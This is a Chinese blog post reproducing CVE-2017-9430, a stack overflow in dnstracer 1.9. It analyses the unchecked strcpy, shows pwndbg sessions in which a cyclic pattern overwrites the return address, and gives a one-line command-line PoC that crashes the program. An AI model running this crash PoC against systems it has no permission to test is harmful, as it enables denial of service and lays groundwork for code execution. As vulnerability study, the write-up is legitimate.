首页 > 其他分享 >dnstracer CVE-2017-9430 复现

dnstracer CVE-2017-9430 复现

时间:2023-04-08 09:00:50浏览次数:55  
标签:main argv0 argv pwndbg dnstracer 2017 CVE 0x0000000000000000 9430

author: cxing
date:2023-4-7
introduction: DNSTracer是一个用来跟踪DNS解析过程的应用程序。DNSTracer 1.9及之前的版本中存在栈缓冲区溢出漏洞。攻击者可借助带有较长参数的命令行利用该漏洞造成拒绝服务(应用程序崩溃)、甚至RCE。

环境搭建

本人Linux虚拟机信息如下:
image.png

OS 64位 Ubuntu22.04 LTS
Arch amd 64
Glibc 2.35

使用下面命令下载和检查DNStracer编译环境

$ wget http://www.mavetju.org/download/dnstracer-1.9.tar.gz
$ tar zxvf dnstracer-1.9.tar.gz
$ cd dnstracer-1.9
$ ./confugure
$ make && sudo make install

修改MakeFile文件CC变量,加上参数-fno-stack-protector -D_FORTIFY_SOURCE=0。此举为了阻止GCC将一些函数优化为安全函数、关闭canary,以便我们更好的再调试中观察栈的溢出情况。

AWK = mawk
CC = gcc -fno-stack-protector -D_FORTIFY_SOURCE=0
DEPDIR = .deps
INSTALL_STRIP_PROGRAM = ${SHELL} $(install_sh) -c -s

漏洞点分析

dnstracer的代码量并不大,非常的少,因此阅读起来非常的轻松。漏洞点也十分的清晰明了,即再main函数中使用了strcpy函数向一个1025字节长度的本地局部变量写入命令行参数argv[0]。代码如下:

int
main(int argc, char **argv)
{
    int		ch;
    char *	server_name = "127.0.0.1";
    char *	server_ip = "0000:0000:0000:0000:0000:0000:0000:0000";
    char	ipaddress[NS_MAXDNAME];
    char	argv0[NS_MAXDNAME]; //  NS_MAXDNAME = 1025
    int		server_root = 0;
    int		ipv6 = 0;

  	// skip some code ....

  	if (argv[0] == NULL) usage();

    // check for a trailing dot
    strcpy(argv0, argv[0]); // stack overflow
    if (argv0[strlen(argv[0]) - 1] == '.') argv0[strlen(argv[0]) - 1] = 0;

    printf("Tracing to %s[%s] via %s, maximum of %d retries\n",
	argv0, rr_types[global_querytype], server_name, global_retries);
    
    // skip some code ....

}

可以很清晰的看到,程序再对argv0写入数据的过程中,未对argv[0]进行边界检查,导致可能发送数组越界写入。因此我们可以轻易的通过对命令行参数的写入足够大的字节溢出argv0数组,破坏main函数的栈帧,致使程序崩溃。

我们再GDB中调试验证一下,先设置好参数信息、断点。我们往args的参数中写入了1100个字节,以及超过1024个字节了,因此我观察栈上是否发送了溢出。

pwndbg: loaded 139 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $ida GDB functions (can be used with print/break)
Reading symbols from dnstracer...
------- tip of the day (disable with set show-tips off) -------
Want to display each context panel in a separate tmux window? See https://github.com/pwndbg/pwndbg/blob/dev/FEATURES.md#splitting--layouting-context
pwndbg> b dnstracer.c:1622
Breakpoint 1 at 0x37a4: file dnstracer.c, line 1622.
pwndbg> cyclic 1100
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaafdaaaaaafeaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaa
pwndbg> set args -v aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaafdaaaaaafeaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaa

我们查看一下argv0变量的数值信息,以及即将保存的old rbp所处的位置(这一行在保存old rbp 0x5555555577a4 <main+740> lea rbp, [rsp + 0x420]

Breakpoint 1, main (argc=<optimized out>, argc@entry=3, argv=<optimized out>, argv@entry=0x7fffffffdbd8) at dnstracer.c:1622
warning: Source file is more recent than executable.
1622        strcpy(argv0, argv[0]); // stack overflow
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────────────
*RAX  0x2
*RBX  0x7fffffffdbd8 —▸ 0x7fffffffded2 ◂— '/usr/local/bin/dnstracer'
 RCX  0x0
*RDX  0x7ffff7e21180 (getopt_data) ◂— 0x100000002
*RDI  0x3
*RSI  0x2
*R8   0x1
 R9   0x0
 R10  0x0
*R11  0x35
*R12  0x7fffffffdeee ◂— 0x6161616161616161 ('aaaaaaaa')
*R13  0x55555555b488 ◂— '4cCoq:r:S:s:t:v'
*R14  0x555555562590 ◂— '127.0.0.53'
*R15  0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
*RBP  0x3
*RSP  0x7fffffffd260 —▸ 0x7ffff7fbbb10 —▸ 0x7ffff7c1e557 ◂— 'GLIBC_PRIVATE'
*RIP  0x5555555577a4 (main+740) ◂— lea rbp, [rsp + 0x420]
───────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────────────────
 ► 0x5555555577a4 <main+740>    lea    rbp, [rsp + 0x420]
   0x5555555577ac <main+748>    mov    rsi, r12
   0x5555555577af <main+751>    mov    rdi, rbp
   0x5555555577b2 <main+754>    call   strcpy@plt                <strcpy@plt>
 
   0x5555555577b7 <main+759>    mov    rdi, r12
   0x5555555577ba <main+762>    call   strlen@plt                <strlen@plt>
 
   0x5555555577bf <main+767>    cmp    byte ptr [rsp + rax + 0x41f], 0x2e
   0x5555555577c7 <main+775>    jne    main+785                <main+785>
 
   0x5555555577c9 <main+777>    mov    byte ptr [rsp + rax + 0x41f], 0
   0x5555555577d1 <main+785>    movsxd rdx, dword ptr [rip + 0x6838] <global_querytype>
   0x5555555577d8 <main+792>    lea    rax, [rip + 0x6841]           <rr_types>
────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────
In file: /home/cxing/workspace/dnstracer-1.9/dnstracer.c
   1617     argv += optind;
   1618 
   1619     if (argv[0] == NULL) usage();
   1620 
   1621     // check for a trailing dot
 ► 1622     strcpy(argv0, argv[0]); // stack overflow
   1623     if (argv0[strlen(argv[0]) - 1] == '.') argv0[strlen(argv[0]) - 1] = 0;
   1624 
   1625     printf("Tracing to %s[%s] via %s, maximum of %d retries\n",
   1626         argv0, rr_types[global_querytype], server_name, global_retries);
   1627 
────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd260 —▸ 0x7ffff7fbbb10 —▸ 0x7ffff7c1e557 ◂— 'GLIBC_PRIVATE'
01:0008│     0x7fffffffd268 ◂— 0xf7fbb160
02:0010│     0x7fffffffd270 ◂— 0x100000000
03:0018│     0x7fffffffd278 —▸ 0x7ffff7fbb4d0 —▸ 0x7ffff7ffe5a0 —▸ 0x7ffff7fbb690 —▸ 0x7ffff7ffe2e0 ◂— ...
04:0020│     0x7fffffffd280 ◂— 0x0
... ↓        2 skipped
07:0038│     0x7fffffffd298 ◂— 0x7fff00000000
──────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────
 ► f 0   0x5555555577a4 main+740
   f 1   0x7ffff7c29d90 __libc_start_call_main+128
   f 2   0x7ffff7c29e40 __libc_start_main+128
   f 3   0x555555557a75 _start+37
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/32gx argv0 
0x7fffffffd680: 0x0000000000000001      0x0000000000000000
0x7fffffffd690: 0x0000000000000001      0x00007ffff7fbb160
0x7fffffffd6a0: 0x00007ffff7fbbb10      0x00007ffff7fbb160
0x7fffffffd6b0: 0x00000001f7ffcf60      0x00007ffff7fbb4d0
0x7fffffffd6c0: 0x0000000000000000      0x00007fff00000000
0x7fffffffd6d0: 0x00007fff00000000      0x00007fff00000000
0x7fffffffd6e0: 0x00000000ffffffff      0x00007ffff7fc3000
0x7fffffffd6f0: 0x00007ffff7fc3908      0x00007ffff7ffdaf0
0x7fffffffd700: 0x00007ffff7fc3590      0x00007ffff7ffca50
0x7fffffffd710: 0x00007ffff7fc38d8      0x00007ffff7fd01d4
0x7fffffffd720: 0x0000000000000218      0x00007ffff7c01b8c
0x7fffffffd730: 0x0000000000001140      0x000000000000000d
0x7fffffffd740: 0x00007ffff7fbb160      0x00007ffff7e191b8
0x7fffffffd750: 0x00005555555574c0      0x000055555555dca8
0x7fffffffd760: 0x00007ffff7ffd040      0x00007ffff7fd5f71
0x7fffffffd770: 0x0000000000000001      0x0000000000000000
pwndbg> x/32gx $rsp+420
0x7fffffffd404: 0xf7fc11a800000000      0xffffd66000007fff
0x7fffffffd414: 0xf7fce7e900007fff      0x0000000600007fff
0x7fffffffd424: 0xf7fc130000000000      0xf7ffe89000007fff
0x7fffffffd434: 0xffffd4d800007fff      0xffffd4d400007fff
0x7fffffffd444: 0xf7fce37c00007fff      0xf7fbb16000007fff
0x7fffffffd454: 0xf7c04ad000007fff      0x0000000000007fff
0x7fffffffd464: 0x0000000000000000      0xffffffffffffff00
0x7fffffffd474: 0xffffffffffffffff      0x42494c47010100ff
0x7fffffffd484: 0x5441564952505f43      0x0000005f5f5f0045
0x7fffffffd494: 0x0000000000000000      0x6c72616500000000
0x7fffffffd4a4: 0x730074696e695f79      0x00000d986c6e7274
0x7fffffffd4b4: 0x0000000000000000      0x0000006000000000
0x7fffffffd4c4: 0x0000000000000000      0x0000000100000000
0x7fffffffd4d4: 0x0000000000000000      0x0000000000000000
0x7fffffffd4e4: 0x0000000000000000      0x0000000000000000
0x7fffffffd4f4: 0x0000000000000000      0x0000000000000000

我看一下RBP寄存器,我们发现rbp寄存器所在的位置已经溢出覆盖为我们填充的数据。而我们再次查看argv0,发现也被填充成了我们的数据。这里已经验证了栈溢出。

pwndbg> n
1623        if (argv0[strlen(argv[0]) - 1] == '.') argv0[strlen(argv[0]) - 1] = 0;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────────────
*RAX  0x7fffffffd680 ◂— 0x6161616161616161 ('aaaaaaaa')
 RBX  0x7fffffffdbd8 —▸ 0x7fffffffded2 ◂— '/usr/local/bin/dnstracer'
*RCX  0x4000000
*RDX  0x1a
*RDI  0x7fffffffdab2 ◂— 'aaaaafkaaaaaaflaaaaaafmaaa'
*RSI  0x7fffffffe320 ◂— 'aaaaafkaaaaaaflaaaaaafmaaa'
 R8   0x1
 R9   0x0
 R10  0x0
 R11  0x35
 R12  0x7fffffffdeee ◂— 0x6161616161616161 ('aaaaaaaa')
 R13  0x55555555b488 ◂— '4cCoq:r:S:s:t:v'
 R14  0x555555562590 ◂— '127.0.0.53'
 R15  0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
*RBP  0x7fffffffd680 ◂— 0x6161616161616161 ('aaaaaaaa')
 RSP  0x7fffffffd260 —▸ 0x7ffff7fbbb10 —▸ 0x7ffff7c1e557 ◂— 'GLIBC_PRIVATE'
*RIP  0x5555555577b7 (main+759) ◂— mov rdi, r12
───────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────────────────
   0x5555555577a4 <main+740>    lea    rbp, [rsp + 0x420]
   0x5555555577ac <main+748>    mov    rsi, r12
   0x5555555577af <main+751>    mov    rdi, rbp
   0x5555555577b2 <main+754>    call   strcpy@plt                <strcpy@plt>
 
 ► 0x5555555577b7 <main+759>    mov    rdi, r12
   0x5555555577ba <main+762>    call   strlen@plt                <strlen@plt>
 
   0x5555555577bf <main+767>    cmp    byte ptr [rsp + rax + 0x41f], 0x2e
   0x5555555577c7 <main+775>    jne    main+785                <main+785>
 
   0x5555555577c9 <main+777>    mov    byte ptr [rsp + rax + 0x41f], 0
   0x5555555577d1 <main+785>    movsxd rdx, dword ptr [rip + 0x6838] <global_querytype>
   0x5555555577d8 <main+792>    lea    rax, [rip + 0x6841]           <rr_types>
────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────
In file: /home/cxing/workspace/dnstracer-1.9/dnstracer.c
   1618 
   1619     if (argv[0] == NULL) usage();
   1620 
   1621     // check for a trailing dot
   1622     strcpy(argv0, argv[0]); // stack overflow
 ► 1623     if (argv0[strlen(argv[0]) - 1] == '.') argv0[strlen(argv[0]) - 1] = 0;
   1624 
   1625     printf("Tracing to %s[%s] via %s, maximum of %d retries\n",
   1626         argv0, rr_types[global_querytype], server_name, global_retries);
   1627 
   1628     srandom(time(NULL));
────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd260 —▸ 0x7ffff7fbbb10 —▸ 0x7ffff7c1e557 ◂— 'GLIBC_PRIVATE'
01:0008│     0x7fffffffd268 ◂— 0xf7fbb160
02:0010│     0x7fffffffd270 ◂— 0x100000000
03:0018│     0x7fffffffd278 —▸ 0x7ffff7fbb4d0 —▸ 0x7ffff7ffe5a0 —▸ 0x7ffff7fbb690 —▸ 0x7ffff7ffe2e0 ◂— ...
04:0020│     0x7fffffffd280 ◂— 0x0
... ↓        2 skipped
07:0038│     0x7fffffffd298 ◂— 0x7fff00000000
──────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────
 ► f 0   0x5555555577b7 main+759
   f 1   0x7f006161616d
   f 2              0x0
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/32gx argv0
0x7fffffffd680: 0x6161616161616161      0x6161616161616162
0x7fffffffd690: 0x6161616161616163      0x6161616161616164
0x7fffffffd6a0: 0x6161616161616165      0x6161616161616166
0x7fffffffd6b0: 0x6161616161616167      0x6161616161616168
0x7fffffffd6c0: 0x6161616161616169      0x616161616161616a
0x7fffffffd6d0: 0x616161616161616b      0x616161616161616c
0x7fffffffd6e0: 0x616161616161616d      0x616161616161616e
0x7fffffffd6f0: 0x616161616161616f      0x6161616161616170
0x7fffffffd700: 0x6161616161616171      0x6161616161616172
0x7fffffffd710: 0x6161616161616173      0x6161616161616174
0x7fffffffd720: 0x6161616161616175      0x6161616161616176
0x7fffffffd730: 0x6161616161616177      0x6161616161616178
0x7fffffffd740: 0x6161616161616179      0x626161616161617a
0x7fffffffd750: 0x6261616161616162      0x6261616161616163
0x7fffffffd760: 0x6261616161616164      0x6261616161616165
0x7fffffffd770: 0x6261616161616166      0x6261616161616167

我们写入1200字节查看一下main的ret,观察返回地址是否被覆盖了。显然在执行到main的ret时,stack当前的rsp指向的栈地址已经是我们填充的数据了。

Program received signal SIGSEGV, Segmentation fault.
0x000055555555790d in main (argc=<optimized out>, argv=<optimized out>) at dnstracer.c:1668
1668    }
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────────────
*RAX  0x0
*RBX  0x6661616161616167 ('gaaaaaaf')
*RCX  0x1
*RDX  0x55555555b0a1 ◂— 0x4100205100205200
 RDI  0x7ffff7e1ba70 (_IO_stdfile_1_lock) ◂— 0x0
 RSI  0x1
 R8   0x7ffff7e1ba70 (_IO_stdfile_1_lock) ◂— 0x0
 R9   0x555555562480 ◂— '127.0.0.53'
 R10  0x555555562560 ◂— 0xd0
 R11  0x246
*R12  0x6661616161616169 ('iaaaaaaf')
*R13  0x666161616161616a ('jaaaaaaf')
*R14  0x666161616161616b ('kaaaaaaf')
*R15  0x666161616161616c ('laaaaaaf')
*RBP  0x6661616161616168 ('haaaaaaf')
*RSP  0x7fffffffda58 ◂— 'maaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
*RIP  0x55555555790d (main+1101) ◂— ret 
───────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────────────────
 ► 0x55555555790d <main+1101>    ret    <0x666161616161616d>










────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────
In file: /home/cxing/workspace/dnstracer-1.9/dnstracer.c
   1663         printf("\n");
   1664         display_arecords();
   1665     }
   1666 
   1667     return 0;
 ► 1668 }
────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffda58 ◂— 'maaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
01:0008│     0x7fffffffda60 ◂— 'naaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
02:0010│     0x7fffffffda68 ◂— 'oaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
03:0018│     0x7fffffffda70 ◂— 'paaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
04:0020│     0x7fffffffda78 ◂— 'qaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
05:0028│     0x7fffffffda80 ◂— 'raaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
06:0030│     0x7fffffffda88 ◂— 'saaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
07:0038│     0x7fffffffda90 ◂— 'taaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaaf'
──────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────
 ► f 0   0x55555555790d main+1101
   f 1 0x666161616161616d
   f 2 0x666161616161616e
   f 3 0x666161616161616f
   f 4 0x6661616161616170
   f 5 0x6661616161616171
   f 6 0x6661616161616172
   f 7 0x6661616161616173
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

至此,我们已经验证了该栈溢出漏洞。

POC

使用下面的命令可以方便的验证该漏洞。最后出现了Segmentation fault (core dumped)的字样,程序崩溃。

cxing@cxing-virtual-machine:~$ dnstracer -v $(python3 -c 'print("a"*1200)')
Tracing to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[a] via 127.0.0.53, maximum of 3 retries
127.0.0.53 (127.0.0.53) IP HEADER
- Destination address:  127.0.0.53
DNS HEADER (send)
- Identifier:           0x2157
- Flags:                0x00 (Q )
- Opcode:               0 (Standard query)
- Return code:          0 (No error)
- Number questions:     1
- Number answer RR:     0
- Number authority RR:  0
- Number additional RR: 0
QUESTIONS (send)
- Queryname:            (-80)aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
- Type:                 1 (A)
- Class:                1 (Internet)
DNS HEADER (recv)
- Identifier:           0x2157
- Flags:                0x8081 (R RA )
- Opcode:               0 (Standard query)
- Return code:          1 (Format error)
- Number questions:     0
- Number answer RR:     0
- Number authority RR:  0
- Number additional RR: 0
QUESTIONS (recv)
- Queryname:            (1).
- Type:                 0 (unknown)
- Class:                0 (unknown)

Segmentation fault (core dumped)

参考

https://www.exploit-db.com/exploits/42424
https://www.freebuf.com/articles/network/163101.html

标签:main,argv0,argv,pwndbg,dnstracer,2017,CVE,0x0000000000000000,9430
From: https://www.cnblogs.com/cx1ng/p/17297899.html

相关文章

  • EasyARM i.MX283A 完整系统制作指南(Linux 4.13.2+U-Boot 2017.09+BusyBox 1.27.2+Qt5
    原文:https://www.taterli.com/3213/标题老长呢.反正什么都是新的,所有都是开源的,除了下载工具以外,所有源码都有(据说下载工具也有,我懒得找了.),编译器源码自己也能做,但是没必要了.代码下载地址:https://github.com/nickfox-taterli/imx283a-new/releases/tag/v0.1首先有一个U......
  • Cesium 案例(三) Web Map Service(WMS) Washington DC 2017
    WMSCesium.Ion.defaultAccessToken="token";   constviewer=newCesium.Viewer("cesiumContainer");   //AddaWMSimagerylayer   constlayer=newCesium.ImageryLayer(    newCesium.WebMapServiceImageryProvider({ ......
  • golang CVE-2016-2183漏洞,https需要添加tls设置加密算法CipherSuites白名单,将弱加密算
    golangCVE-2016-2183漏洞,https需要添加tls设置加密算法白名单,将弱加密算法DES和3DES去掉。服务端样例代码packagemainimport("crypto/tls""fmt""net/http")funchandler(writerhttp.ResponseWriter,request*http.Request){fmt.Fprintf(wri......
  • VS2017 未能正确加载“ReferenceManagerPackage”包
    MicrosoftVisualStudio未能正确加载“ReferenceManagerPackage”包。1.以管理员身份打开DeveloperCommandPromptforVS20172.定位到你的vs2017的安装目录我安装的是企业版就是E:\ProgramFiles(x86)\MicrosoftVisualStudio\2017\Enterprise\Common7\IDE\PublicAssemblies......
  • 漏洞丨CVE20102883
